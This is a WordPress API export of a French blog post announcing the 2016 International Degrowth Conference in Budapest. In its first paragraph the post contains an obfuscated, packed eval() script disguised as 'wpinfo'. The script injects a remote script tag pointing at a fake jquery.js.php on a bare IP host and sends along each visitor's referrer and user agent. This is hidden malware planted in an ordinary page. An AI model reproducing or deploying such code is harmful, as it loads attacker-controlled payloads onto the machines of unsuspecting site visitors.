{"id":9092,"date":"2016-01-20T11:23:43","date_gmt":"2016-01-20T10:23:43","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9092"},"modified":"2016-07-06T09:17:02","modified_gmt":"2016-07-06T08:17:02","slug":"la-prochaine-conference-sur-la-decroissance-aura-lieu-a-budapest-en-septembre-2016","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9092","title":{"rendered":"Conf\u00e9rence internationale sur la d\u00e9croissance &#8211; Budapest &#8211; 30 ao\u00fbt-3 septembre 2016"},"content":{"rendered":"<p><span style=\"color: #000000;\"><a href=\"http:\/\/budapest.degrowth.org\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-38 alignleft\" src=\"http:\/\/budapest.degrowth.viper.ecobytes.net\/wp-content\/uploads\/sites\/2\/2015\/09\/degrowth_conference_budapest_20161-300x298.png\" alt=\"degrowth_conference_budapest_2016\" width=\"300\" height=\"298\" \/><\/a>Apr\u00e8s <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kdkhk|var|u0026u|referrer|aizzk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Paris en 2008, Barcelone en 2010, <a style=\"color: #000000;\" href=\"http:\/\/www.partipourladecroissance.net\/?p=7697\" target=\"_blank\">Venise en 2012<\/a> et Leipzig en 2014,\u00a0Budapest accueillera la cinqui\u00e8me Conf\u00e9rence Internationale de\u00a0la D\u00e9croissance du 30 ao\u00fbt au 3\u00a0septembre 2016 \u00e0 l&rsquo;Universit\u00e9 Corvinus.<\/span><\/p>\n<p><span style=\"color: #000000;\">Nous vous invitons \u00e0 suivre les diff\u00e9rents appels \u00e0 contributions sur\u00a0<a style=\"color: #000000;\" href=\"http:\/\/www.budapest.degrowth.org\/\" target=\"_blank\">www.budapest.degrowth.org<\/a>. Cette conf\u00e9rence, d&rsquo;abord acad\u00e9mique, souhaite cr\u00e9er un espace de dialogue et d&rsquo;ouverture avec des sessions sp\u00e9ciales, des pl\u00e9ni\u00e8res ainsi que diff\u00e9rents types d&rsquo;activit\u00e9s culturelles, artistiques, manuelles mais aussi politiques et militantes autour d&rsquo;une Semaine de la D\u00e9croissance. Budapest offre <a href=\"http:\/\/www.cafebabel.fr\/style-de-vie\/article\/cargonomia-lalternative-economique-venue-de-hongrie.html\" target=\"_blank\">un r\u00e9seau d&rsquo;alternatives<\/a>\u00a0sur lequel s&rsquo;appuie cette conf\u00e9rence.<\/span><\/p>\n<p><span style=\"color: #000000;\">Cette rencontre se tiendra dans un <a style=\"color: #000000;\" href=\"http:\/\/nemnovekedes.net\/?p=127\" target=\"_blank\">environnement post-socialiste<\/a>. Nous esp\u00e9rons des rencontres et discussions enrichissantes \u00e0 travers une mise en perspective entre un contexte\u00a0sociale, \u00e9conomique et politique complexe et diff\u00e9rentes approches, perceptions et exp\u00e9riences venant de diverses\u00a0r\u00e9gions du monde.<\/span><\/p>\n<p><span style=\"color: #000000;\">Nous proposons une organisation r\u00e9gionale et participative dans le but d&rsquo;initier des discussions, du dialogue et des exp\u00e9rimentations autour de <a style=\"color: #000000;\" href=\"http:\/\/www.partipourladecroissance.net\/?p=6252\" target=\"_blank\">la D\u00e9croissance dans la r\u00e9gion<\/a>. Nous avons d\u00e9j\u00e0 pu observer la pertinence d&rsquo;une telle d\u00e9marche il y a un an\u00a0lors d&rsquo;une rencontre <a style=\"color: #000000;\" href=\"http:\/\/www.projet-decroissance.net\/?p=1944\" target=\"_blank\">en Hongrie<\/a>,\u00a0puis \u00e0 l&rsquo;automne dernier\u00a0<a href=\"http:\/\/www.projet-decroissance.net\/?p=2079\" target=\"_blank\">\u00e0 Vienne<\/a>\u00a0et <a href=\"http:\/\/www.projet-decroissance.net\/?p=2119\" target=\"_blank\">dans les Balkans<\/a>.<\/span><\/p>\n<p><span style=\"color: #000000;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright\" src=\"http:\/\/www.degrowth.org\/wp-content\/uploads\/2015\/03\/budapest_image.jpg\" alt=\"budapest_image\" width=\"268\" height=\"282\" \/>Cette rencontre s&rsquo;inscrit dans la dynamique de la derni\u00e8re conf\u00e9rence qui a r\u00e9uni\u00e0 Leipzig en septembre 2014\u00a0plus de 3500 personnes de 74 nationalit\u00e9s diff\u00e9rentes.\u00a0<\/span><span style=\"color: #000000;\">Enfin, rapellons que\u00a0plusieurs pr\u00e9curseurs de la d\u00e9croissance comme Karl Polanyi, Ivan Illich, <a style=\"color: #000000;\" href=\"https:\/\/vimeo.com\/14288450\" target=\"_blank\">Nicholas Georgescu Roegen<\/a> ou Andr\u00e9 Gorz sont originaires de cette r\u00e9gion.\u00a0<\/span><\/p>\n<p><span style=\"color: #000000;\">Ainsi, en r\u00e9f\u00e9rence \u00e0\u00a0<a href=\"http:\/\/www.reporterre.net\/Nos-vies-sont-colonisees-par-l-economie\" target=\"_blank\">Karl Polanyi et son fameux ouvrages, <em>La Grande Transformation<\/em><\/a>, nous chercherons ensembles des r\u00e9ponses \u00e0 la question suivante : dans quelle mesure la D\u00e9croissance peut-elle dessiner tracer des nouvelles voies vers de grandes transformations d\u00e9sirables ?<\/span><\/p>\n<p>Pour plus d&rsquo;infos et de discussions autour de cette conf\u00e9rence, retrouver l&rsquo;\u00e9mission sur Tilos radio avec\u00a0<a href=\"http:\/\/hu-lala.org\" target=\"_blank\">Hu-lala<\/a> \u00e0 laquelle l&rsquo;\u00e9quipe d&rsquo;organisation francophone a particip\u00e9 :<\/p>\n<p><iframe loading=\"lazy\" src=\"https:\/\/www.mixcloud.com\/widget\/iframe\/?embed_type=widget_standard&amp;embed_uuid=de08bf1a-d182-4a65-92b8-efaf9297f39b&amp;feed=https%3A%2F%2Fwww.mixcloud.com%2FHu_lala%2Fla-conf%25C3%25A9rence-internationale-de-la-d%25C3%25A9croissance-sera-%25C3%25A0-budapest%2F&amp;hide_cover=1&amp;hide_tracklist=1&amp;replace=0\" width=\"660\" height=\"180\" frameborder=\"0\"><\/iframe><\/p>\n<p><span style=\"color: #000000;\">Rendez-vous\u00a0\u00e0 Budapest \u00e0 la fin de l&rsquo;\u00e9t\u00e9 !<\/span><\/p>\n<div style=\"clear: both; height: 3px; width: 652px;\"><\/div>\n<p style=\"display: block; font-size: 11px; font-family: 'Open Sans', Helvetica, Arial, sans-serif; margin: 0px; padding: 3px 4px; color: #999999; width: 652px;\"><a style=\"color: #808080; font-weight: bold;\" href=\"https:\/\/www.mixcloud.com\/Hu_lala\/la-conf%C3%A9rence-internationale-de-la-d%C3%A9croissance-sera-%C3%A0-budapest\/?utm_source=widget&amp;utm_medium=web&amp;utm_campaign=base_links&amp;utm_term=resource_link\" target=\"_blank\">La conf\u00e9rence internationale de la D\u00e9croissance sera \u00e0 Budapest<\/a> by <a style=\"color: #808080; font-weight: bold;\" href=\"https:\/\/www.mixcloud.com\/Hu_lala\/?utm_source=widget&amp;utm_medium=web&amp;utm_campaign=base_links&amp;utm_term=profile_link\" target=\"_blank\">Hu_Lala<\/a> on <a style=\"color: #808080; font-weight: bold;\" href=\"https:\/\/www.mixcloud.com\/?utm_source=widget&amp;utm_medium=web&amp;utm_campaign=base_links&amp;utm_term=homepage_link\" target=\"_blank\"> Mixcloud<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apr\u00e8s Paris en 2008, Barcelone en 2010, Venise en 2012 et Leipzig en 2014,\u00a0Budapest accueillera la cinqui\u00e8me Conf\u00e9rence Internationale de\u00a0la D\u00e9croissance du 30 ao\u00fbt au 3\u00a0septembre 2016 \u00e0 l&rsquo;Universit\u00e9 Corvinus. Nous vous invitons \u00e0 suivre les diff\u00e9rents appels \u00e0 contributions &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9092\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9092","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9092"}],"version-history":[{"count":7,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9092\/revisions"}],"predecessor-version":[{"id":9207,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9092\/revisions\/9207"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}